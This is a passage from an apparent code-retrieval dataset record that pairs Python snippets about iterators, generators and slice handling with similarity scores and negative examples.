_next(self):\n i = 0\n while i < self.size:\n yield self.data[i]\n i += 1", "def just(n, seq):\n it = iter(seq)\n for _ in range(n - 1):\n yield next(it, None)\n yield tuple(it)", "def seq(min=0.0, max=None, inc=1.0, type=float,\n return_type='NumPyArray'):\n if max is None: # allow sequence(3) to be 0., 1., 2., 3.\n # take 1st arg as max, min as 0, and inc=1\n max = min; min = 0.0; inc = 1.0\n r = arange(min, max + inc/2.0, inc, type)\n if return_type == 'NumPyArray' or return_type == ndarray:\n return r\n elif return_type == 'list':\n return r.tolist()\n elif return_type == 'tuple':\n return tuple(r.tolist())", "def __iter__(self):\n for i in range(len(self)):\n yield self[i]", "def __iter__(self):\n for i in range(len(self)):\n yield self[i]", "def takespread(sequence, num):\n length = float(len(sequence))\n for i in range(num):\n yield sequence[int(np.ceil(i * length / num))]", "def __iter__(self):\n for batch in self.iterator:\n yield Batch.from_iterator_batch(batch, self.pad_index, self.sos_index, self.eos_index)", "def counter_wrapper(generator):\n for value in generator:\n yield value", "def prime_generator() -> Iterator[int]:\n\n num = 2\n while True:\n if is_prime(num):\n yield num\n num += 1", "def iwindow(seq, n):\n it = iter(seq)\n result = tuple(islice(it, n))\n\n if len(result) == 
n:\n yield result\n\n for elem in it:\n result = result[1:] + (elem,)\n yield result", "def __iter__(self):\n\n # Wanted to do this, but count() only accepts numbers:\n # return count(start, timedelta(days=self.step))\n\n next = self.start\n while (True):\n yield next\n next = next + timedelta(days=self.step)", "def cycle(iterator: Iterable[Any]) -> Iterable[Any]:\n while True:\n yield from iterator", "def takespread(sequence, num):\n length = float(len(sequence))\n for i in range(num):\n yield sequence[int(ceil(i * length / num))]", "def square_numbers_2(nums):\n for i in nums:\n yield(i*i)", "def coordinate_iterator(coords, atoms_per_res):\n assert len(coords) % atoms_per_res == 0, f\"There must be {atoms_per_res}\" \\\n f\" atoms for every residue.\\n\" \\\n f\"len(coords) = {len(coords)}\"\n i = 0\n while i + atoms_per_res <= len(coords):\n yield coords[i:i + atoms_per_res]\n i += atoms_per_res", "def fromiter(iterable, dtype, count=-1):\n\n return call_origin(numpy.fromiter, iterable, dtype, count)", "def iterator(self):\n yield", "def geom_iter(self, g_nums):\n # Using the custom coded pack_tups to not have to care whether the\n # input is iterable\n from .utils import pack_tups\n\n vals = pack_tups(g_nums)\n for val in vals:\n yield self.geom_single(val[0])", "def __next__(self):\n self._k += 1\n if self._k < len(self._seq):\n return(self._seq[self._k])\n else:\n # print('*** End of iteration. ***')\n raise StopIteration()", "def __iter__(self):\n with open(self.fn + \".fai\") as fai:\n for toks in (l.rstrip(\"\\r\\n\").split(\"\\t\") for l in fai):\n yield toks[0], int(toks[1])", "def __iter__(self):\n for idx in range(0, self.Npoints):\n position = self.start + (self.end-self.start)/self.Npoints*idx\n yield position\n raise StopIteration()", "def make_data_iterator(input):\n assert isinstance(input, DataLoader)\n data_iterator = iter(input)\n return data_iterator", "def task_10_generator_of_simple_numbers() -> Generator[int, None, None]:\n def is_num_simple(n):\n \"\"\"\n Return: True if n is a simple number or False if it is not\n \"\"\"\n for i in range(n, 1, -1):\n if n % i == 0 and i < n and n != 1:\n return False\n return True\n\n # generator part\n n = 2\n while n < 200:\n if is_num_simple(n):\n yield n\n n = n + 1", "def __iter__(self) -> Iterator[int]:\n return iter(self._tasks)", "def __iter__(self):\n cursor = 0\n while cursor < len(self):\n yield self._items[cursor]\n cursor += 1", "def item_iter(self, a):\r\n for i in a[0]:\r\n yield i", "def __init__(self, iterator):\n self._iter = iterator", "def construct_sequence_list(self):\n return list(self.iter_sequence())", "def __iter__(self):\n for index in range(len(self)):\n yield self[index]", "def enhancer_iterator(self, data, labels, batch_size, num_steps):\n def seq_to_ints(seq):\n return [self.vocab.word_to_index[c] for c in seq]\n\n # Map raw data to array of ints. 
if all sequences are the same length L, \n # raw_data will be N-by-L\n mdata = np.array([seq_to_ints(i) for i in data], dtype=np.int32)\n num_batches = len(mdata) // batch_size\n \n # data will have batch_len elements, each of size batch_size\n # ASSUME FIXED SEQUENCE LENGTHS OFF 1000 FOR NOW (5/20/16)\n # Just grab middle self.config.num_steps nucleotides\n a = int(len(mdata[0,:])/2-self.config.num_steps/2)\n b = int(len(mdata[0,:])/2+self.config.num_steps/2)\n for i in range(num_batches):\n x = mdata[batch_size*i:batch_size*(i+1),a:b]\n if labels is not None:\n y = labels[batch_size*i:batch_size*(i+1)]\n else:\n y = None\n yield(x,y)", "def get_integers(bitwidth: int, unsigned: bool, limit: int = 0) -> Generator:\n if unsigned:\n start, stop = 0, ((1 << bitwidth) - 1)\n else:\n start, stop = (-(1 << bitwidth - 1)), (1 << (bitwidth - 1) - 1)\n\n for num in _fuzzdb_integers(limit):\n if num >= start and num <= stop:\n yield num", "def __next__(self):\n\t\tif self.i >= len(self.l):\n\t\t\tself.i = 0\n\t\t\traise StopIteration\n\t\tresult = self.l[self.i]\n\t\tself.i += 1\n\t\treturn result", "def parse_input(data: Iterator[str]) -> Iterator[SnailfishNumber]:\n yield from (SnailfishNumber.from_str(line.strip())\n for line in data)", "def __iter__(self):\n cursor = self.first()\n while cursor is not None:\n yield cursor.element()\n cursor = self.after(cursor)", "def __iter__(self):\n for val in self.value:\n yield val", "def numbers_gen(num) -> Generator[Number, None, None]:\n with open(f'data/phone-numbers-{num}.txt', 'rb') as numbers:\n for number in numbers:\n yield number[:-1]", "def task5(count):\n number_1, number_2 = 1, 1\n for _ in range(count):\n yield number_1\n number_1, number_2 = number_2, number_1 + number_2" ]
[ "0.6523413", "0.6352263", "0.6295878", "0.6285677", "0.6251581", "0.6161719", "0.6161719", "0.6123521", "0.59559906", "0.59429246", "0.5929433", "0.59055716", "0.5842463", "0.58171993", "0.57896346", "0.57666224", "0.57651085", "0.5762295", "0.5750994", "0.5719213", "0.5710208", "0.5660005", "0.5647652", "0.56463015", "0.5594679", "0.5562186", "0.5554404", "0.55411124", "0.55244726", "0.5523953", "0.551829", "0.5512887", "0.5506301", "0.5502796", "0.5461537", "0.5456875", "0.54566455", "0.5444559", "0.54386854", "0.541617", "0.5406899", "0.5405977", "0.5382206", "0.53692025", "0.5357977", "0.5354353", "0.5348255", "0.5342732", "0.5320226", "0.5319833", "0.53174233", "0.531431", "0.53075397", "0.52737164", "0.52711916", "0.52660334", "0.5256489", "0.525456", "0.525283", "0.5242673", "0.5222617", "0.5220848", "0.5211441", "0.5205737", "0.5191523", "0.5189647", "0.5188273", "0.5188273", "0.51853275", "0.5184499", "0.51843673", "0.51780784", "0.5176253", "0.51672417", "0.5164649", "0.5162953", "0.51620734", "0.51611775", "0.5158733", "0.5147183", "0.51457864", "0.5143809", "0.5143065", "0.5139063", "0.5137835", "0.51337695", "0.513222", "0.51314217", "0.5129203", "0.51274294", "0.51250637", "0.5123991", "0.5119622", "0.5115771", "0.5110735", "0.51070136", "0.5106897", "0.5106381", "0.51042503", "0.50986344" ]
0.70666045
0
Create iterator from slice object.
def from_slice(self, slice):
    start = 0 if slice.start is None else slice.start
    step = 1 if slice.step is None else slice.step
    return self.count(start, step, stop=slice.stop)
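A standalone sketch of the same slice-normalization logic, assuming the count helper it delegates to (defined later in this file) treats stop as an exclusive upper bound; the expand_slice name is hypothetical.

import itertools

# Normalize a slice into (start, step, stop) with the same defaults as the
# document above, then expand it lazily with itertools.
def expand_slice(sl):
    start = 0 if sl.start is None else sl.start
    step = 1 if sl.step is None else sl.step
    out = itertools.count(start, step)
    if sl.stop is not None:
        out = itertools.takewhile(lambda x: x < sl.stop, out)
    return out

print(list(expand_slice(slice(2, 10, 2))))  # [2, 4, 6, 8]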
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def slice(iterable, *args):\n return iter(it.islice(iterable, *args))", "def __getitem__(self, arg):\n if isinstance(arg, slice):\n # get value from slice\n start, stop, step = arg.start, arg.stop, arg.step\n # sanitize step\n if step is None:\n step = 1\n if step < 1:\n raise ValueError(\"step must be positive\")\n # make sure the stream is in the right place to start\n if start is None:\n start = 0\n if start < self.current:\n self.rewind(start)\n if start > self.current:\n self.skip_forward(start - self.current)\n\n # sanity check\n if stop is not None and stop < start:\n raise ValueError(\"start must be less than stop\")\n # special case, we can't just return self, because __iter__ rewinds\n if step == 1 and stop is None:\n # keep going until exhausted\n return (self.next() for _ in itertools.repeat(True))\n\n return self._step_gen(step, stop)\n\n elif isinstance(arg, int):\n self.rewind(arg)\n return self.next()\n else:\n raise ValueError(\"Invalid arguement, use either a `slice` or \" +\n \"or an `int`. not {t}\".format(t=str(type(arg))))", "def from_sequence(self, seq):\n return Iter(self._from_sequence(seq))", "def __getitem__(self, i):\n self._load(False)\n\n if type(i) == slice:\n # Normalize the slice a bit such that it doesn't\n # have any negative or None values\n start, stop, step = i.start, i.stop, i.step\n if start is None:\n start = 0\n elif start < 0:\n start += self.count\n if stop is None:\n stop = self.count\n elif stop < 0:\n stop += self.count\n if not step:\n step = 1\n\n # If we're iterating backwards, start at the end\n if step < 0:\n key = self.head - self.count + stop - 1\n else:\n key = self.head - self.count + start\n\n return self._iter(key, stop - start, step)\n else:\n if i < 0:\n i += self.count\n return self.db[(self.head - self.count + i) % self.size]", "def __getslice__(self, start, stop):\n return self.__getitem__(slice(start, stop, None))", "def frombuffer(self, slice_data):\n return NotImplemented", "def SliceView(sequence, start=None, stop=None, step=1):\n start, stop, step = slice(start, stop, step).indices(len(sequence))\n for i in range(start, stop, step):\n yield sequence[i]", "def __iter__(self):\n\n starts = range(0, self.data.shape[self.axis], self.chunksize)\n\n for t in zip_longest(starts, starts[1:], fillvalue=None):\n yield self.data[self._slice(*t)]", "def __getitem__(self, ndx):\n if type(ndx) is slice:\n return list(islice(self._all(), ndx.start, ndx.stop, ndx.step or 1))\n else:\n return islice(self._all(), ndx, ndx+1).next()", "def _slice(self, start, stop, step=None):\n\n slices = [slice(None)] * self.data.ndim\n slices[self.axis] = slice(start, stop, step)\n return tuple(slices)", "def slice(self, begin, end):\n sliced = self._collection.slice(begin, end)\n return self.set_collection(sliced)", "def _conv_slice_to_list(slice_obj, start_def=0, stop_def=100, step_def=1):\n if slice_obj.start is None:\n start = start_def\n else:\n start = slice_obj.start\n if slice_obj.stop is None:\n stop = stop_def\n else:\n stop = slice_obj.stop\n if slice_obj.step is None:\n step = step_def\n else:\n step = slice_obj.step\n return list(range(start, stop, step))", "def create_slice(*, stop : Optional[int] = None, start : Optional[int] = None, step : Optional[int] = None) -> slice:\n return slice(start, stop, step)", "def normalize_slice(s):\n start, stop, step = s.start, s.stop, s.step\n if start is None:\n start = 0\n if step is None:\n step = 1\n if start < 0 or step < 0 or stop is not None and stop < 0:\n raise NotImplementedError()\n return 
slice(start, stop, step)", "def _make_dataset_iterator(self, dataset):\n # Note that split_batch_by argument is not passed because it is always 1 in\n # this strategy, and adding it adds unnecessary overhead to the dataset.\n return input_lib_v1.DatasetIterator(dataset, self._input_workers,\n self._container_strategy())", "def from_iterable(self, iterable):\n raise NotImplementedError()", "def test_getslice1(self):\n class C(list):\n def __getitem__(self, index):\n return (index.start, index.stop)\n\n a = C()\n self.assertEqual(a[32:197], (32,197))", "def __getitem__(self, item):\n if isinstance(item, slice):\n start = item.start or 0\n stop = item.stop if item.stop is not None else len(self.data)\n stop = min(stop, len(self.data))\n if stop - start == 0:\n return type(self)(xnd.xnd([], type=self.data.type))\n\n elif isinstance(item, Iterable):\n if not is_array_like(item):\n item = np.array(item)\n if is_integer_dtype(item):\n return self.take(item)\n elif is_bool_dtype(item):\n indices = np.array(item)\n indices = np.argwhere(indices).flatten()\n return self.take(indices)\n else:\n raise IndexError(\n \"Only integers, slices and integer or boolean \\\n arrays are valid indices.\"\n )\n\n elif is_integer(item):\n if item < 0:\n item += len(self)\n if item >= len(self):\n return None\n else:\n\n return self.data[item]\n\n value = self.data[item]\n return type(self)(value)", "def __setslice__(self, *args):\n return _itkLineSpatialObjectPointPython.vectoritkLineSpatialObjectPoint2___setslice__(self, *args)", "def slicer(seq, start=None, stop=None, step=None):\n return seq[start:stop:step]", "def make_data_iterator(input):\n assert isinstance(input, DataLoader)\n data_iterator = iter(input)\n return data_iterator", "def fromiter(iterable, dtype, count=-1):\n\n return call_origin(numpy.fromiter, iterable, dtype, count)", "def _get_slice(segments, shape):\n\n if not (1 <= len(shape) <= 2):\n raise ValueError('Cannot segment array of shape: %s' % str(shape))\n else:\n size = shape[0]\n slice_length = np.ceil(float(size) / segments)\n start_idx = 0\n end_idx = slice_length\n while start_idx < size:\n if len(shape) == 1:\n yield slice(start_idx, end_idx)\n else:\n yield (slice(start_idx, end_idx), slice(None))\n start_idx = end_idx\n end_idx = min(start_idx + slice_length, size)", "def __getslice__(self, i, j):\n return self.__getitem__(slice(i,j))", "def __getslice__(self, i, j):\n return self.__getitem__(slice(i, j))", "def __iter__(self):\n pass\n\n # TODO: range, based on iterator", "def __getitem__(self, t: Union[slice, Sequence[int], Sequence[bool]]\n ) -> \"ImageSequence\":\n t = self._resolve_index(t)\n if isinstance(t, np.ndarray):\n ret = copy.copy(self)\n ret._indices = t\n ret._is_slice = True\n ret._len = len(t)\n return ret\n # Assume t is a number\n return self._get_single_frame(int(t))", "def __getitem__(self, idx):\n if not isinstance(idx, slice):\n return self._fetch()[idx]\n return self._fetch()[idx.start:idx.stop]", "def __getitem__(self, item: slice | tuple):\n if isinstance(item, slice):\n start, stop = item.start, item.stop\n if start is None:\n start = 0\n if stop is None:\n stop = maxsize\n if start > stop:\n raise IndexError(\"make sure start <= stop\")\n return self.query(Orthotope([Interval(start, stop)]))\n elif isinstance(item, tuple):\n pass\n else:\n raise TypeError(f\"unrecognized index {item}\")", "def process_slice(slc, shape, n):\n if not isinstance(slc, tuple):\n slc = (slc,)\n slc = list(slc)\n ndim = len(shape) - n\n assert ndim >= 0\n shape_idx = 0\n for 
slice_idx, s in enumerate(slc):\n if s == nax:\n continue\n if shape[shape_idx] == 1:\n if type(s) == int:\n slc[slice_idx] = 0\n else:\n slc[slice_idx] = slice(None)\n shape_idx += 1\n if shape_idx != ndim:\n raise IndexError('Must have %d terms in the slice object' % ndim)\n return extend_slice(tuple(slc), n)", "def slice_(self, start, stop):\n \n sl = UnorderedList()\n \n current = self.head\n \n for i in range(min(stop, self.length())):\n if i >= start:\n sl.append(current.get_data())\n current = current.get_next()\n \n return sl", "def __getitem__(self, idx):\n # if key is slice, return a new HSP instance\n if isinstance(idx, slice):\n obj = self.__class__(self._items[idx])\n self._transfer_attrs(obj)\n return obj\n return self._items[idx]", "def from_slicer(cls, *args, **kwargs):\n slicer_instance = cls.__new__(cls)\n cls._init_slicer(slicer_instance, *args, **kwargs)\n return slicer_instance", "def slice(self, start=None, end=None, inplace=False):\n if inplace:\n self.data = self.data[start:end]\n else:\n cpy = self.copy()\n\n cpy.data = cpy.data[start:end]\n\n return cpy\n return", "def __iter__(self):\n try:\n self._load(False)\n except KeyError:\n return iter([])\n\n return self._iter(self.head - self.count, self.count)", "def _create_slice(cls, onnx_node, inputs, opset_version):\n # we move several inputs to singa's attribuates\n # and mark them so we don't use them when we run this operator\n starts = tensor.to_numpy(inputs.pop(1)).astype(np.int32).tolist()\n ends = tensor.to_numpy(inputs.pop(1)).astype(np.int32).tolist()\n # sometime onnx may ignore these two inputs, axes and step\n if len(inputs) >= 2 and onnx_node.inputs[3] != '':\n axes = tensor.to_numpy(inputs.pop(1)).astype(np.int32).tolist()\n else:\n axes = None\n steps = tensor.to_numpy(inputs.pop(1)).astype(\n np.int32).tolist() if len(inputs) >= 2 else None\n onnx_node.consumed_inputs.extend(onnx_node.inputs[1:])\n _, forward = cls._common_onnx_node_to_singa_op(onnx_node, inputs,\n opset_version)\n return _, forward(starts, ends, axes, steps)", "def __getitem__(self, idx):\n assert isinstance(\n idx, (int, slice)), \"Index Could be an integer or a slice\"\n\n if isinstance(idx, int) and idx < 0:\n for cur_index in range(-idx):\n obj, pos = self.__get_json_from_end()\n if -cur_index - 1 == idx:\n return json.loads(obj, encoding=\"utf-8\")\n raise IndexError\n\n if isinstance(idx, slice):\n to_extract = (elm for elm in gen_increasing_slice(idx))\n else:\n to_extract = [idx]\n\n results = []\n\n for target_idx in to_extract:\n self.__descriptor.seek(0, 0)\n cur_idx = 0\n\n checkpoint = self.__get_checkpoint(target_idx)\n if checkpoint != False:\n self.__descriptor.seek(checkpoint[1])\n cur_idx = checkpoint[0]\n self.__last_index = checkpoint[0]\n self.__last_index_pos = checkpoint[1]\n\n if self.__last_index > cur_idx and target_idx > self.__last_index:\n self.__descriptor.seek(self.__last_index_pos)\n cur_idx = self.__last_index\n\n for obj, start in iter(lambda: self.__get_json(), (None, -1)):\n last_obj = obj\n self.__last_index_pos = start\n self.__last_index = cur_idx\n\n if cur_idx == target_idx:\n results.append(json.loads(last_obj, encoding=\"utf-8\"))\n break\n\n cur_idx += 1\n\n if isinstance(idx, slice):\n if idx.start is not None and idx.stop is not None and idx.start > idx.stop:\n return list(reversed(results))\n return results\n else:\n return results.pop(0)", "def __getitem__(self, n):\n s = self._clone()\n\n if isinstance(n, slice):\n # If negative slicing, abort.\n if n.start and n.start < 0 or n.stop 
and n.stop < 0:\n raise #XXX\n # Elasticsearch won't get all results so we default to size: 10 if\n # stop not given.\n s._extra['from'] = n.start or 0\n s._extra['size'] = n.stop - (n.start or 0) if n.stop else 10\n return s\n else: # This is an index lookup, equivalent to slicing by [n:n+1].\n # If negative index, abort.\n if n < 0:\n raise #XXX\n s._extra['from'] = n\n s._extra['size'] = 1\n return s", "def to_slice(self):\n return np.index_exp[self.start[2]:self.end[2], #\n self.start[1]:self.end[1], #\n self.start[0]:self.end[0]]", "def _slice(self, dict_data, partition):\n dict_data_iter = iter(dict_data)\n for _ in range(0, len(dict_data), partition):\n yield {k: dict_data[k] for k in islice(dict_data_iter, partition)}", "def _get_slice(series, start, length):\n return [ int(s) for s in series[start:start+length] ]", "def __iter__(self):\n # type: () -> Iterator[Any]\n return iter(self[index] for index in range(len(self)))", "def __iter__(self):\n # deterministically shuffle based on epoch\n if self.shuffle:\n g = torch.Generator()\n g.manual_seed(self.epoch)\n indices = torch.randperm(len(self.dataset), generator=g).tolist()\n else:\n indices = torch.arange(len(self.dataset)).tolist()\n\n # add extra samples to make it evenly divisible\n indices += indices[:(self.total_size - len(indices))]\n if not len(indices) == self.total_size:\n raise ValueError('the length of the indices should be equal to total_size')\n\n # subsample\n indices = indices[self.rank:self.total_size:self.num_replicas]\n if not len(indices) == self.num_samples:\n raise ValueError(\"the length of the indices should be equal to num_samples in subsample\")\n\n return iter(indices)", "def _read_sorted_slice(self, *args, **kwargs): # real signature unknown\n pass", "def _read_sorted_slice(self, *args, **kwargs): # real signature unknown\n pass", "def __setslice__(self, *args):\n return _itkSurfaceSpatialObjectPointPython.vectoritkSurfaceSpatialObjectPoint2___setslice__(self, *args)", "def __iter__(self) -> Iterator:\n if self.ndim > 1:\n for i in range(len(self)):\n yield self[i]\n else:\n # convert in chunks of 10k for efficiency\n data = self.asi8\n length = len(self)\n chunksize = 10000\n chunks = (length // chunksize) + 1\n\n for i in range(chunks):\n start_i = i * chunksize\n end_i = min((i + 1) * chunksize, length)\n converted = ints_to_pydatetime(\n data[start_i:end_i],\n tz=self.tz,\n box=\"timestamp\",\n reso=self._creso,\n )\n yield from converted", "def __setslice__(self, *args):\n return _itkLineSpatialObjectPointPython.vectoritkLineSpatialObjectPoint3___setslice__(self, *args)", "def __iter__(self):\n return iter(range(1, self.size() + 1))", "def _init_sorted_slice(self, *args, **kwargs): # real signature unknown\n pass", "def byte_slices(self) -> Iterator[slice]:\n for byte_index in islice(self.byte_offsets, 0, self.max_bytes, 8):\n yield slice(byte_index, byte_index + 8)", "def slice(self) -> Tuple[slice, ...]:\n\n total_slice = tuple(slice(None) for _ in self.collection_shape)\n for obj in self.objects.flat:\n for i, current_slice in enumerate(obj.slices):\n if total_slice[i].start is None:\n total_slice = total_slice[:i] + (current_slice,) + total_slice[i + 1:]\n else:\n if current_slice.start < total_slice[i].start:\n total_slice = total_slice[:i] + (\n slice(current_slice.start, total_slice[i].stop, total_slice[i].step),) + total_slice[i + 1:]\n if current_slice.stop > total_slice[i].stop:\n total_slice = total_slice[:i] + (\n slice(total_slice[i].start, current_slice.stop, total_slice[i].step),) + 
total_slice[i + 1:]\n return total_slice", "def __iter__(self) -> Union[Iterator[int], Iterator[Tuple[int, Any]]]:\n self.size = self._data._dataset_size\n if (not self._data._fully_cached or\n self._data._should_call_prefetch_source):\n self._data._start_iteration()\n # First epoch of lazy loading, calling prefetch, and returning\n # indices and examples.\n iterator = self._iterator_unknown_size()\n else:\n # Non-lazy loading, or when dataset has been fully iterated.\n assert self.size is not None\n iterator = self._iterator_given_size(self.size)\n\n if self._data._should_call_prefetch_processed:\n # Processing routine is performed in main process. Yield\n # processed examples instead.\n map_fn = lambda idx: (idx, self._data._processed_cache[idx])\n elif self._data._should_yield_raw_example:\n # Return indices and examples for any epoch in this case.\n map_fn = lambda idx: (idx, self._data._source[idx])\n else:\n map_fn = None # type: ignore\n if map_fn is not None:\n return map(map_fn, iterator)\n\n return iterator", "def slice(\n start: Optional[int] = None, stop: Optional[int] = None, step: int = 1\n) -> Callable[[AsyncObservable[_TSource]], AsyncObservable[_TSource]]:\n\n def _slice(source: AsyncObservable[_TSource]) -> AsyncObservable[_TSource]:\n nonlocal start\n\n if start is not None:\n if start < 0:\n source = pipe(source, take_last(abs(start)))\n else:\n source = pipe(source, skip(start))\n\n if stop is not None:\n if stop > 0:\n start = start or 0\n source = pipe(source, take(stop - start))\n else:\n source = pipe(source, skip_last(abs(stop)))\n\n if step is not None:\n if step > 1:\n mapper: Callable[[Any, int], bool] = lambda _, i: i % step == 0\n xs = pipe(source, filteri(mapper))\n source = xs\n elif step < 0:\n # Reversing streams is not supported\n raise TypeError(\"Negative step not supported.\")\n\n return source\n\n return _slice", "def subseq(self, start_offset=0, end_offset=None):\n def subseq_iter(start_offset, end_offset):\n for point in self._elements:\n #Skip until start\n if point[offset_attr] < start_offset:\n continue\n\n #Yield points start_offset <= point < end_offset\n if end_offset is None or point[offset_attr] < end_offset:\n yield point\n else:\n raise StopIteration\n return _OSeq(subseq_iter(start_offset, end_offset))", "def __setslice__(self, i, j, sequence):\n self.__field.validate(sequence)\n list.__setslice__(self, i, j, sequence)", "def _handle_result_by_idx_slice(self, idx_slice):\n opts = dict(self.options)\n skip = opts.pop('skip', 0)\n limit = opts.pop('limit', None)\n py_to_couch_validate('skip', skip)\n py_to_couch_validate('limit', limit)\n start = idx_slice.start\n stop = idx_slice.stop\n data = None\n # start and stop cannot be None and both must be greater than 0\n if all(i is not None and i >= 0 for i in [start, stop]) and start < stop:\n if limit is not None:\n if start >= limit:\n # Result is out of range\n return dict()\n if stop > limit:\n # Ensure that slice does not extend past original limit\n return self._ref(skip=skip+start, limit=limit-start, **opts)\n data = self._ref(skip=skip+start, limit=stop-start, **opts)\n elif start is not None and stop is None and start >= 0:\n if limit is not None:\n if start >= limit:\n # Result is out of range\n return dict()\n # Ensure that slice does not extend past original limit\n data = self._ref(skip=skip+start, limit=limit-start, **opts)\n else:\n data = self._ref(skip=skip+start, **opts)\n elif start is None and stop is not None and stop >= 0:\n if limit is not None and stop > limit:\n # 
Ensure that slice does not extend past original limit\n data = self._ref(skip=skip, limit=limit, **opts)\n else:\n data = self._ref(skip=skip, limit=stop, **opts)\n return data", "def test_slice(self):\n user_a = self.Person.objects.create(name=\"User A\", age=20)\n user_b = self.Person.objects.create(name=\"User B\", age=30)\n user_c = self.Person.objects.create(name=\"User C\", age=40)\n\n # Test slice limit\n people = list(self.Person.objects[:2])\n assert len(people) == 2\n assert people[0] == user_a\n assert people[1] == user_b\n\n # Test slice skip\n people = list(self.Person.objects[1:])\n assert len(people) == 2\n assert people[0] == user_b\n assert people[1] == user_c\n\n # Test slice limit and skip\n people = list(self.Person.objects[1:2])\n assert len(people) == 1\n assert people[0] == user_b\n\n # Test slice limit and skip on an existing queryset\n people = self.Person.objects\n assert len(people) == 3\n people2 = people[1:2]\n assert len(people2) == 1\n assert people2[0] == user_b\n\n # Test slice limit and skip cursor reset\n qs = self.Person.objects[1:2]\n # fetch then delete the cursor\n qs._cursor\n qs._cursor_obj = None\n people = list(qs)\n assert len(people) == 1\n assert people[0].name == \"User B\"\n\n # Test empty slice\n people = list(self.Person.objects[1:1])\n assert len(people) == 0\n\n # Test slice out of range\n people = list(self.Person.objects[80000:80001])\n assert len(people) == 0\n\n # Test larger slice __repr__\n self.Person.objects.delete()\n for i in range(55):\n self.Person(name=\"A%s\" % i, age=i).save()\n\n assert self.Person.objects.count() == 55\n assert \"Person object\" == \"%s\" % self.Person.objects[0]\n assert (\n \"[<Person: Person object>, <Person: Person object>]\"\n == \"%s\" % self.Person.objects[1:3]\n )\n assert (\n \"[<Person: Person object>, <Person: Person object>]\"\n == \"%s\" % self.Person.objects[51:53]\n )", "def __get_slice(islice, isize):\n if islice[0] is None:\n if islice[1] is None:\n return slice(isize)\n else:\n return slice(islice[1])\n else:\n if islice[1] is None:\n return slice(islice[0], isize)\n else:\n return slice(islice[0], islice[1])", "def _slice_index(self, slicer):\n start = self.index_location(slicer.start) if slicer.start is not None else 0\n end = self.index_location(slicer.stop) if slicer.stop is not None else self.size\n return list(range(start, end))", "def __getslice__(self, *args):\n return _itkLineSpatialObjectPointPython.vectoritkLineSpatialObjectPoint2___getslice__(self, *args)", "def get_slice(self, limit, offset):\r\n if limit == 0:\r\n return self.objects[offset:]\r\n\r\n return self.objects[offset:offset + limit]", "def _getitem_slice(self: MultiIndex, slobj: slice) -> MultiIndex:\n sortorder = None\n if slobj.step is None or slobj.step > 0:\n sortorder = self.sortorder\n\n new_codes = [level_codes[slobj] for level_codes in self.codes]\n\n return type(self)(\n levels=self.levels,\n codes=new_codes,\n names=self._names,\n sortorder=sortorder,\n verify_integrity=False,\n )", "def getSlice(properties=None, **kw):", "def relay_array_getitem(c, a, start, stop, strides):\n assert start.is_constant(tuple)\n assert stop.is_constant(tuple)\n assert strides.is_constant(tuple)\n return relay.op.transform.strided_slice(c.ref(a), start.value, stop.value,\n strides.value)", "def __getitem__(self, item):\n # type (Any) -> Any\n # Workaround for Arrow bug that segfaults on empty slice.\n # This is fixed in Arrow master, will be released in 0.10\n if isinstance(item, slice):\n start = item.start or 0\n stop = 
item.stop if item.stop is not None else len(self.data)\n stop = min(stop, len(self.data))\n step = item.step if item.step is not None else 1\n # Arrow can't handle slices with steps other than 1\n # https://issues.apache.org/jira/browse/ARROW-2714\n if step != 1:\n arr = np.asarray(self)[item]\n # ARROW-2806: Inconsistent handling of np.nan requires adding a mask\n if pa.types.is_integer(self.dtype.arrow_dtype) or pa.types.is_floating(\n self.dtype.arrow_dtype\n ):\n mask = pd.isna(arr)\n else:\n mask = None\n return type(self)(pa.array(arr, type=self.dtype.arrow_dtype, mask=mask))\n if stop - start == 0:\n return type(self)(pa.array([], type=self.data.type))\n elif isinstance(item, Iterable):\n if not is_array_like(item):\n item = np.array(item)\n if is_integer_dtype(item):\n return self.take(item)\n elif is_bool_dtype(item):\n indices = np.array(item)\n indices = np.argwhere(indices).flatten()\n return self.take(indices)\n else:\n raise IndexError(\n \"Only integers, slices and integer or boolean arrays are valid indices.\"\n )\n elif is_integer(item):\n if item < 0:\n item += len(self)\n if item >= len(self):\n return None\n value = self.data[item]\n if isinstance(value, pa.ChunkedArray):\n return type(self)(value)\n else:\n return value.as_py()", "def __iter__(self):\r\n if self._shuffle:\r\n perm = torch.randperm(self._subset_size)\r\n return iter(self._subset[perm].tolist())\r\n return iter(self._subset)", "def __getitem__(self, i: Union[int, slice]) -> Union[Any, LinkedList]:\n\n if isinstance(i, int):\n\n if i < 0:\n i = self._length + i\n\n curr = self._first\n curr_index = 0\n\n while curr is not None and curr_index != i:\n curr = curr.next\n curr_index += 1\n\n if curr is None:\n raise IndexError\n else:\n return curr.item\n else:\n start = i.start\n stop = i.stop\n\n if start is None:\n start = 0\n if stop is None:\n stop = self._length\n\n if not (0 <= start <= stop <= len(self)):\n raise IndexError\n else:\n new_linked_list = LinkedList([])\n index = 0\n\n for item in self:\n if start <= index < stop:\n new_linked_list.append(item)\n elif index > stop:\n break\n index += 1\n\n return new_linked_list", "def copy(self) -> \"Iter\":\n self._iterator, other = itertools.tee(self._iterator, 2)\n return Iter(other, self._size_hint)", "def __init__(self, iterator):\n self._iter = iterator", "def __init__(self, data, chunksize, axis, **kwargs):\n \n super().__init__(data, chunksize, axis, **kwargs)\n\n # Pop the start and stop from kwargs\n a = self.kwargs.pop('start', 0)\n b = self.kwargs.pop('stop', self.data.shape[axis])\n self.start, self.stop, _ = slice(a, b).indices(data.shape[axis])\n \n # close for serialization\n self.data.close()", "def cqt_slices(record, t_len, shuffle=True, auto_restart=True,\n add_noise=True, random_seed=None,\n slice_logger=None):\n def cqt_slicer(cqt, idx, counter, t_len):\n obs = utils.slice_ndarray(cqt, idx[counter], length=t_len, axis=1)\n return obs[np.newaxis, ...]\n\n for cqt_slice in base_slicer(\n record, t_len, cqt_slicer,\n shuffle=shuffle, auto_restart=auto_restart,\n add_noise=add_noise, random_seed=random_seed,\n npz_data_key='cqt',\n slice_logger=slice_logger):\n yield cqt_slice", "def __init__(self, iterator):\n super().__init__(iterator,\n join=lambda x: x, empty=lambda x: [],\n init=lambda content, index: content)", "def chunkerator(obj: Iterable, stepsize: int = 10) -> Iterator:\n\n if obj:\n chunk, obj = obj[0:stepsize], obj[stepsize:]\n\n try:\n yield chunk\n yield from chunkerator(obj, stepsize=stepsize)\n except (RuntimeError, 
